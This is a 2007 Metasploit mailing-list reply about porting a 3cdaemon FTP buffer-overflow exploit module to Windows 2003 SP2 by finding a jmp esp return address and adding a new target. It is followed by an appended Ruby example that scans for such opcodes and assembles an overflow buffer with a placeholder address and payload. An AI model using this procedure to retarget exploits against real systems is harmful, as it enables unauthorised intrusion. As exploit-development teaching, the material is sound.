[framework] Porting exploit to win2k3 sp2
Jerome Athias
jerome.athias at free.fr
Fri Jul 27 10:27:11 CDT 2007
Konrads Smelkovs wrote :
> Hello,
>
> I found a useful exploit in the framework - 3cdaemon_ftp_user.rb .
> However, it has the jumpcodes(?) only for nt/2k/xp and I need it for
> win2k3 sp2. How to port it? Perhaps somebody already has done so?
> --
> Konrads Smelkovs
> Applied IT sorcery.
Hi Konrads,
the jumpcodes (called "opcodes" in the Metasploit family) have to be
modified.
In fact, you have to add a new line, as a new target, in the exploit
module code.
To retrieve an opcode for your target, you have to:
1) Search one in the msfopcodes database
http://www.metasploit.com/opcode_database.html
or here:
https://www.securinfos.info/international-opcodes/index.php
(not currently updated :-/)
or
2) Run one of these tools on it (or on a clone, meaning: same OS, locale,
SP, and if possible the same level of patches installed; assuming all are
installed is a good way):
* msfpescan (used with memdump.exe)
You can find an overview of msfpescan here:
The Metasploit website! Always THE place to find information about the MSF
The Metasploit Framework's book:
http://en.wikibooks.org/wiki/Metasploit/WritingWindowsExploit#Finding_a_return_address
hxxp://www.securityfocus.com/infocus/1800
or:
* findjmp2 by class101
https://www.securinfos.info/outils-securite-hacking/Findjmp2.zip
* eereap by eEye
Good luck!
/JA
Jerome Athias, Founder https://www.securinfos.info
PS1: you will probably also have to change the offset and/or deal with the
new protection mechanisms introduced in Windows 2003 (DEP...)
PS2: I have written an article for Hakin9 about how to write exploit
modules for the MSF v3. It should be available in the coming months (in
both US and French versions)
PS3: is copyrighted by Sony
Non-profit spam: retrieve the top killer coding ninja monkeys at
VNSECON07, http://conf.vnsecurity.net/
Tags:
How to modify a Metasploit's exploit module
How to retrieve a return address (opcode) for a Windows exploit
How to add a target in a Metasploit Framework exploit module
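Added example to illustrate the two steps Jerome describes above: locating a "jmp esp"-style opcode in an image (what msfpescan -j esp does) and adding the address found as a new target entry that gets packed into the overflow buffer. This is not code from the original message and not the 3cdaemon_ftp_user.rb module; the image bytes, base address, target name and offset are constructed placeholders, and the module-style helpers (find_jmp_esp, add_target, build_buffer) are hypothetical names.

```ruby
# Added example, not code from the original message or from the
# 3cdaemon_ftp_user.rb module. It mimics two steps of the procedure above:
#   1) scanning an image for "jmp esp"-style opcodes (what msfpescan -j esp does)
#   2) adding the address found as a new target and packing it into the buffer.
# The image bytes, base address, target name and offset are all constructed
# placeholders; take real values from the real target system, never these.

# Opcode sequences a stack overflow commonly returns into.
JMP_SEQUENCES = {
  "\xFF\xE4".b => 'jmp esp',
  "\xFF\xD4".b => 'call esp',
  "\x54\xC3".b => 'push esp; ret'
}.freeze

# Return [virtual_address, mnemonic] pairs for every hit in the image.
# base is the load address (ImageBase). A real scanner maps file offsets to
# section RVAs; this one treats the blob as one contiguous mapping.
def find_jmp_esp(image, base)
  hits = []
  JMP_SEQUENCES.each do |seq, name|
    pos = image.index(seq)
    while pos
      hits << [base + pos, name]
      pos = image.index(seq, pos + 1)
    end
  end
  hits.sort_by(&:first)
end

# Constructed stand-in for a module's memory dump: nop filler with a
# "jmp esp" at +0x1234 and a "push esp; ret" at +0x2000.
SAMPLE_BASE = 0x10000000
def sample_image
  img = "\x90".b * 0x3000
  img[0x1234, 2] = "\xFF\xE4".b
  img[0x2000, 2] = "\x54\xC3".b
  img
end

# Targets table in the shape Metasploit 3 modules use:
#   [ 'name', { 'Ret' => address } ]
# Supporting another OS/SP is one more entry; nothing else in the module
# needs to change unless the offset differs too.
def add_target(targets, name, ret)
  targets + [[name, { 'Ret' => ret }]]
end

# Assemble the overflow string: junk up to the saved return address, the
# target's Ret packed little-endian (pack('V'), as Metasploit modules do),
# a short nop sled, then the payload. offset is whatever the vulnerable
# binary needs for that build; the 100 used below is a constructed value.
def build_buffer(target, offset, payload)
  buf = 'A'.b * offset
  buf << [target[1]['Ret']].pack('V')
  buf << "\x90".b * 16
  buf << payload.b
end

if $PROGRAM_NAME == __FILE__
  hits = find_jmp_esp(sample_image, SAMPLE_BASE)
  hits.each { |va, name| printf("0x%08x  %s\n", va, name) }
  targets = add_target([], 'Windows 2003 SP2 (constructed)', hits.first[0])
  buf = build_buffer(targets.last, 100, "\xCC".b * 4)
  puts "buffer: #{buf.bytesize} bytes, ret=0x#{buf[100, 4].unpack1('V').to_s(16)}"
end
```

Two checks a practitioner wants before pasting a found address into a module: the bytes of the address must survive the protocol (an FTP USER argument cannot carry NUL, CR or LF), and the module the address comes from must not be rebased or patched between machines, which is why the reply insists on scanning a clone with the same OS, locale, SP and patch level. The PS1 caveat also matters here: on Windows 2003 SP1 and later DEP is on by default, so a plain jmp esp into a stack-resident payload will fault unless the process is exempted or the exploit avoids executing from the stack.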